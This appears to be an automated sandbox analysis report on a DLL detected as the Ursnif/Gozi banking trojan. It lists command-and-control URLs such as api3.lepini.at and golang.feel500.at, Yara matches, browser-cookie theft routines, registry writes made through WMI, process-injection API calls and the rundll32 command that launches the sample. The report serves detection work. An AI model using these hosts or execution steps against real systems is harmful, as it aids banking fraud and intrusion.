Source: unknown | HTTP traffic detected: POST /api1/LMJLtOqdu8fp_2BNLOB5YBP/qly_2BfzDH/EAemu37KWi1Sk2xGU/KUNgOk1dCHS6/AgjNesC_2FL/0VRR3489g9d213/hnGFcgoP3NnJY57aNNU7X/g37VutmCLLvxlC3K/uWdTjPXn7_2BhUq/Ng_2FAVek6bgpkb4dt/OleaxmqWa/3cqZOMqKlEvnCHKOagPS/Ml3FT3Cf6J9pNtnQsAy/H2GMz5cmt0xhyUBUDbZV2P/wT6YuW4qyfVDR/pXcknYbm/8zZh_2FbRECix2oRrtcd2ZU/_2B7miWVVc/ZZTomZrPf3ghqQ7Sj/_2FENCrsSLt7/pXfjB HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 | Content-Length: 2 | Host: api3.lepini.at
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 12 Feb 2021 08:59:57 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip | Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: loaddll32.exe, rundll32.exe, powershell.exe, 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, rundll32.exe, 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, powershell.exe, 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000001E.00000003.614713182.00000232FA37D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000001.00000003.542325936.0000000000C41000.00000004.00000001.sdmp | String found in binary or memory: http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/
Source: rundll32.exe, 00000001.00000002.619811108.0000000000BE2000.00000004.00000001.sdmp | String found in binary or memory: http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFo
Source: loaddll32.exe, 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, rundll32.exe, 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, rundll32.exe, 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, powershell.exe, 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000001E.00000002.656957513.00000232F1F33000.00000004.00000001.sdmp, powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000021.00000002.614677054.0000018F5E2FE000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001E.00000002.617070310.00000232E1ED1000.00000004.00000001.sdmp, powershell.exe, 00000021.00000002.613638611.0000018F5E0F1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000021.00000002.614677054.0000018F5E2FE000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000021.00000002.614677054.0000018F5E2FE000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001E.00000002.656957513.00000232F1F33000.00000004.00000001.sdmp, powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match | File source: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.483299200.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.531676520.00000000054AF000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.483227814.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.483286163.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.483203935.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.483151802.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.437340303.00000000056AB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.483178397.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.483270828.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.436829571.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.437112820.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.593087987.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.436872189.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.437218385.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.437202688.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.435392429.0000000005828000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000003.483251728.0000000007178000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6224, type: MEMORY
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6200, type: MEMORY

            E-Banking Fraud:

            Detected Gozi e-Banking trojan
            Source: C:\Windows\System32\loaddll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff | 0_2_009B5ECA
            Source: C:\Windows\System32\loaddll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie | 0_2_009B5ECA
            Source: C:\Windows\System32\loaddll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff | 0_2_009B5ECA
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff | 1_2_00C95ECA
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie | 1_2_00C95ECA
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff | 1_2_00C95ECA
            Yara detected Ursnif (same memory matches as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above)

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Win32.Gozi Author: CCN-CERT
            Source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Win32.Gozi Author: CCN-CERT
            Writes or reads registry keys via WMI
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMI
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009BA027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread | 0_2_009BA027
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C7AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA | 0_2_009C7AFF
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009CAC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64 | 0_2_009CAC94
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C6CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA | 0_2_009C6CBC
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009BACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose | 0_2_009BACD5
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009CCD7A NtQueryInformationProcess | 0_2_009CCD7A
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009B7E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64 | 0_2_009B7E14
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C40A7 memset,NtQueryInformationProcess | 0_2_009C40A7
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009B7878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError | 0_2_009B7878
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009D298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError | 0_2_009D298D
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009BAA15 NtQuerySystemInformation,RtlNtStatusToDosError | 0_2_009BAA15
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C4C67 NtGetContextThread,RtlNtStatusToDosError | 0_2_009C4C67
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009B9DAC NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError | 0_2_009B9DAC
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009B45FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle | 0_2_009B45FF
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW | 0_2_009C956E
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C1606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError | 0_2_009C1606
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009B37E7 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError | 0_2_009B37E7
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C9E010 GetProcAddress,NtCreateSection,memset | 1_2_00C9E010
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C9A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread | 1_2_00C9A027
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA7AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA | 1_2_00CA7AFF
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C9ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose | 1_2_00C9ACD5
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CAAC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64 | 1_2_00CAAC94
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA6CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA | 1_2_00CA6CBC
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C99DAC NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError | 1_2_00C99DAC
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CACD7A NtQueryInformationProcess | 1_2_00CACD7A
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA7579 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset | 1_2_00CA7579
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C97E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64 | 1_2_00C97E14
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C937E7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError | 1_2_00C937E7
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CB47A1 NtMapViewOfSection | 1_2_00CB47A1
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA40A7 memset,NtQueryInformationProcess | 1_2_00CA40A7
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C97878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError | 1_2_00C97878
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CB298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError | 1_2_00CB298D
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C9AA15 NtQuerySystemInformation,RtlNtStatusToDosError | 1_2_00C9AA15
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA4C67 NtGetContextThread,RtlNtStatusToDosError | 1_2_00CA4C67
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C945FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle | 1_2_00C945FF
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW | 1_2_00CA956E
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA1606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError | 1_2_00CA1606
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009D1CB8 CreateProcessAsUserA | 0_2_009D1CB8
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C48AD | 0_2_009C48AD
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009BD0DC | 0_2_009BD0DC
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009CD057 | 0_2_009CD057
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009D7188 | 0_2_009D7188
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009B62FA | 0_2_009B62FA
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009BE384 | 0_2_009BE384
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C8BF3 | 0_2_009C8BF3
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009B4C03 | 0_2_009B4C03
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009CED4B | 0_2_009CED4B
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009D3EAF | 0_2_009D3EAF
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009CD7BD | 0_2_009CD7BD
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C9D0DC | 1_2_00C9D0DC
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA48AD | 1_2_00CA48AD
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CAD057 | 1_2_00CAD057
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CB7188 | 1_2_00CB7188
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C962FA | 1_2_00C962FA
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA8BF3 | 1_2_00CA8BF3
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C9E384 | 1_2_00C9E384
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C94C03 | 1_2_00C94C03
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CAED4B | 1_2_00CAED4B
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CB3EAF | 1_2_00CB3EAF
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CAD7BD | 1_2_00CAD7BD
            Source: lojdfmf3.dll.36.dr | Static PE information: No import functions for PE file found
            Source: cuuygyc1.dll.35.dr | Static PE information: No import functions for PE file found
            Source: 4puomjgc.dll.39.dr | Static PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: u8xtCk7fq8.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
            Source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
            Source: classification engine | Classification label: mal100.bank.troj.evad.winDLL@39/68@13/2
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009BA7B1 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle | 0_2_009BA7B1
            Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{1B3B83AA-6D5C-11EB-90E5-ECF4BB2D2496}.dat
            Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{160F585B-7D7B-B806-B7AA-016CDB7EC560}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{B2482645-6990-B41E-8306-AD28679A31DC}
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4712:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6192:120:WilError_01
            Source: C:\Windows\System32\loaddll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{9608A54E-FD26-38BC-372A-81EC5BFE45E0}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{5E77434C-2577-40BE-9F72-297443C66DE8}
            Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Temp\~DF94A0433F3C84B120.TMP
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Program Files\internet explorer\iexplore.exe | File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1
            Source: u8xtCk7fq8.dll | Virustotal: Detection: 33%
            Source: loaddll32.exe | String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
            Source: rundll32.exe | String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
            Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll'
